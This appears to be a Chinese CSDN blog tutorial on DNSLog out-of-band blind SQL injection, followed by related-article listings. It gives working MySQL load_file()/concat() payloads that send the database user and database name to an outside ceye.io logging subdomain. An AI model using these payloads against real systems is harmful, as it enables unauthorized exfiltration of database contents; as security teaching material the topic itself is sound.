SQL注入-DNSLOG打消你的盲打盲注

已于 2022-02-18 20:39:19 修改
阅读量4.2k 收藏 2
点赞数
分类专栏: web安全-sql注入 文章标签: sql web安全 安全
于 2022-02-18 11:03:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54217950/article/details/122972755
版权

Dnslog

Dnslog就是存储在DNS Server上的域名信息,它记录着用户对域名www.test.com、t00ls.com.等的访问信息。

Dnslog盲注

对于SQL盲注,我们可以通过布尔或者时间盲注获取内容,但是整个过程效率低,需要发送很多的请求进行判断,容易触发安全设备的防护,Dnslog盲注可以减少发送的请求,直接回显数据实现注入 使用DnsLog盲注仅限于windos环境。
在这里插入图片描述
其中,红色部分是可控的。我们只需要搭建一个红色部分的DNS服务器,并将要盲打或盲注的回显,放到自己域名的二级甚至三级域名上去请求,就可以通过DNS解析日志来获取到它们。

场景一SQL盲注回显

在数据库中攻击语句被执行,由concat函数将执行结果与XXX.ceye.io\\abc拼接,构成一个
新的域名,而mysql中的select load_file()可以发起请求,那么这一条带有数据库查询结果
的域名就被提交到DNS服务器进行解析,此时,如果我们可以查看DNS服务器上的Dnslog就可以
得到SQL注入结果。那么我们如何获得这条DNS查询记录呢?注意注入语句中的ceye.io,这其实
是一个开放的Dnslog平台(具体用法在官网可见),在http://ceye.io上我们可以获取到有关
ceye.io的DNS查询信息。实际上在域名解析的过程中,是由顶级域名向下逐级解析的,我们构造
的攻击语句也是如此,当它发现域名中存在ceye.io时,它会将这条域名信息转到相应的NS服务
器上,而通过http://ceye.io我们就可以查询到这条DNS解析记录。

注意:loda_file函数在mysql8.0版本之后已经被弃用,同时想要使用此函数数据库的配置文件中此项secure_file_priv=’'配置。

爆数据库用户名:
and load_file(concat("\\\\",hex(user()),".ajma31.ceye.io\\abc"))#  注意:这里因为结果里含有@关键字所以结果需要准换成十六进制编码才能实现。并且这里的.ajma31.ceye.io自己申请的,每个都不同。
爆数据库名:
and load_file(concat("\\\\",database(),".ajma31.ceye.io\\abc"))#

网页后台结果:
在这里插入图片描述
hex转码
在这里插入图片描述

不会就跑路的小白
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
26-5 SQL 注入攻击 - 利用dnslog带回回显信息范例
weixin_43263566的博客
03-14 266
因此,这个 payload 的目的是利用 SQL 注入漏洞,尝试加载指定路径下的文件内容,并将结果返回给攻击者。这个 payload 旨在利用盲注漏洞来执行 SQL 查询,通过。目标:使用 DVWA 的盲注作为靶机,获取数据库信息。函数加载数据库中的内容,并将结果返回给攻击者。
SQL注入DnsLog注入
qq_52310755的博客
03-22 1956
远程访问UNC路径中主机的地址,如果是域名将会进行解析并留下记录,通过查看DNS解析记录(DNS日志)来达到有回显的目的。DnsLog注入就是利用load_file()函数访问远程文件的特点,对延时盲注等无回显的注入或其他无回显的攻击带来回显。正常来讲每个查询记录都会在相应DNS服务器上留下相关的查询日志,一般来说企业或者自己部署的DNS在上图标红位置处,Ps:如果paylaod没有问题但一直刷新不出来可能是谷歌浏览器的问题,换个浏览器访问一下就可以了。,下面以盲注为例,需要有盲注的基础。
Web安全】浅谈SQL注入攻击的概念、原理和防范措施:简单分析六种常见攻击方式
HEX9CF的技术博客
11-19 1828
SQL注入是一种常见的攻击技术,攻击者通过在用户输入的数据中插入恶意SQL代码来执行非授权的数据库操作。使用参数化查询或预编译语句:参数化查询或预编译语句可以将用户输入的数据与SQL查询语句分开处理,从而避免拼接字符串的方式,减少了SQL注入的风险。UNION注入是另一种常见的SQL注入技术,攻击者试图通过使用UNION操作符将两个表的内容合并在一起,从而获取有关数据库结构和数据的敏感信息。输入验证和过滤:对于用户输入的数据,应该进行充分的验证和过滤,确保输入的数据符合预期的格式和类型。
DNSlog漏洞探测_服务器访问dnslog服务器是代表有漏洞吗
最新发布
2401_84973011的博客
05-12 898
DNSlog 是一种 DNS 隧道技术,用于数据泄露或命令和控制(C2)通信。它利用 DNS 协议的特性,将数据编码为 DNS 查询或响应,从而实现数据通信。DNSlog 可用于检测子域取代、未授权区域传输和其他 DNS 相关漏洞。攻击者:攻击者将数据编码为 DNS 查询或响应,然后将其发送到 DNS 服务器。DNS 服务器:DNS 服务器会解析查询,并将响应发送回攻击者。攻击者:攻击者可以从 DNS 响应中提取数据,从而实现数据泄露或 C2 通信。
五种常见的DNS攻击类型及应对方式
A_991128a的博客
08-23 606
随着俄乌冲突中网络战的升级,DNS安全成为业界关注的焦点。无论是去年3月份NSA发布的保护性DNS(PDNS)推荐指南,还是俄罗斯互联网的核心——DNS服务在战争期间的大规模启用,都表明DNS安全威胁在不断升级。DNS记录着全球域名与IP地址的一一映射关系,是互联网中最基础的服务之一。由于其在互联网中的重要性以及DNS体系的先天局限性,DNS很容易成为网络攻击的重要目标。
SQL注入之MYSQL注入
av11566的博客
04-19 7094
前言 MYSQL注入中首先要明确当前注入点权限,高权限注入时有更多的攻击手法,有的能直接进行getshell操作。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。不论作为攻击还是防御都需要了解其中的手法和原理,这样才是一个合格的安全工作者。 必要知识 在MYSQL5.0以上版本中,MYSQL存在一个自带数据库名为information_schema,它是一个存储记录有所有数据库名,表名,列名的数据库,也相当于可以通过查询它获取指定数据库下面的表名或者列名信息。 数据库中符号"
@2-办公软件-键盘盲打练习软件.exe
03-21
盲打软件。
盲打助手(Touch-Typing) 1.0 正式版
07-21
盲打助手(Touch-Typing)---软件介绍及使用说明 软件概述: 盲打助手(Touch-Typing)是一款Windows平台的轻量级桌面应用,该应用主要用于辅助新手学习键盘盲打。 软件特色: 1.软件主体是一个虚拟的标准键盘,该...
pygame盲打练习项目
10-01
pygame盲打练习项目是一个使用Python编程语言和pygame库开发的小型游戏应用,旨在帮助用户提高打字速度和准确性。这个项目充分利用了pygame的功能,提供了一个交互式的盲打练习环境,让用户在娱乐中提升键盘技能。 ...
盲打练习 键盘盲打练习软件 v7.70
10-24
"键盘盲打练习软件 v7.70"独具特色,它结合了真人语音报键功能,每当你按下键盘上的一个键,软件都会发出相应的语音提示,帮助用户建立键位与声音之间的关联,通过听觉反馈加深对键位的记忆。这对于初学者来说尤其...
键盘练习-盲打之友
01-06
本文将详细解析这款名为“盲打之友2.6”的练习程序,带你深入了解其功能特点和使用方法。 盲打,即不看键盘就能准确快速地输入文字,是专业打字员和日常电脑用户都需要掌握的技能。"盲打之友2.6"正是为此目的而设计...
DNSLog漏洞探测(三)之XSS漏洞实战
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-12 1053
DNSLog的平台实际使用很长见的一种情况就是针对漏洞无回显的情况,我们通过让受害者的服务器主动发起对DNSLog服务平台的请求去外带一些信息,但更多的使用场景是我们仅仅使用DNSLog去作为探测漏洞是否存在的一种手段。现在我们回到DNSLog服务平台,点击 Refresh Record刷新,然后DNSLog服务平台便会返回给我们DNSLog解析记录,这下我们就通过DNSLog平台验证了该处存在XSS漏洞。通过前面的学习,我们已经明白了什么是DNSLog平台,那么DNSLog平台到底能为我们做些什么呢?
DNSLOG相关知识
12306小哥
07-15 575
0x01 DNS知识 域名系统(Domain Name System),是互联网使用的命名系统,用来便于人们使用的机器名字转换为IP地址。 0x02 DNS解析 2.1 解析过程要点 当某一个应用进程需要把主机名解析为IP地址时,该应用进程就调用解析程序,并成为DNS的一个客户(DNS Client),把待解析的域名放在DNS请求报文中,以UDP用户数据报方式发给本地域名服务器(使用UDP是为了减少开销)。本地域名服务器在查找域名后,把对应的IP地址放在响应报文中返回。应用进程获得目的主机的IP地址后即可进
dnslog注入_dnslog盲注
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-09 1772
dnslog注入原理通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将dnslog注入盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。dnslog注入主要用于布尔型盲注、时间型盲注、有注入但是无显示,注入线程太大容易被waf拦截等情况。主要原理就是利用load_file这个函数,这个函数的目的是读取本地文件,也可以对外发送请求,利用这个函数,我们再使用concat函数将dnslog
渗透测试---手把手教你SQL注入(4)--DNSLOG外带注入
weixin_52796034的博客
10-10 758
通常我们面对SQL注入过程中没有回显的情况时,只能通过盲注的方式来判断是否存在SQL注入,但是,使用盲注,需要花费大量时间进行测试,并且还可能需要对目标服务器发送大量请求,这会导致我们的IP容易被目标服务器封掉.
使用DNSLog进行盲打
谢公子的博客
04-28 5922
在渗透测试中,SQL盲注、命令盲注等漏洞是较难利用的,由于无回显,这类漏洞即使存在也显得有些鸡肋。针对此类问题,我们可以使用DNSLOG来进行突破。DNSLOG是一种回显机制,使用者可以通过DNS解析日志来读取漏洞的回显。 参考文章:使用DNSLOG拯救你的盲打盲注 ...
dnslogsql注入中的应用
whatday的专栏
07-23 700
目录 1.DNSLOG的原理 2.Dnslog在常见数据库中SQL注入的实战 1、MySQL 2、msSQL 3、postgreSQL 4、Oracle 3.总结 1.DNSLOG的原理 DNS的解析是递归与迭代相结合的,下面给出了当我们访问www.cloudcrowd.com.cn时, DNS的解析过程示意图 其中,红色部分是可控的。我们只需要搭建一个红色部分的DNS服务器,并将要盲打盲注的回显,放到自己域名的二级甚至三级域名上去请求,就可以通过DNS解析日志来获取到它们。
深度剖析DNSLog注入原理&本地实例测试
monster663的博客
02-08 6203
声明:本文仅做学习交流探讨之用,切勿用于违法用途,请遵循《中华人民共和国网络安全法》,共同维护清朗的网络空间 Dns_log注入简介 我们将利用DNS解析的过程将留下痕迹和mysql中load_file()函数的能够访问互联网中的文件这一特点,将一些渗透的过程中将我们需要测试网站的结果回显到一个特定的可以记录DNS日志网站中,关于DNS的原理请参考https://blog.csdn.net/king9666/article/details/106022050 应用场景 DNS_log注入常用于网站对
HW2021攻防演练经历碎碎念-见解
Jay
07-18 2314
HW2021攻防演练经历碎碎念。
网络安全基础:SQL注入、XSS攻击与防御策略
26. X$S盲打是针对Oracle数据库的注入攻击,利用特定的SQL结构探测内网信息。 27. 鱼叉式攻击针对特定个体,通过伪装信任来源发送恶意邮件。 28. 水坑攻击攻击者针对特定目标经常访问的网站进行入侵。 29. 虚拟机...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值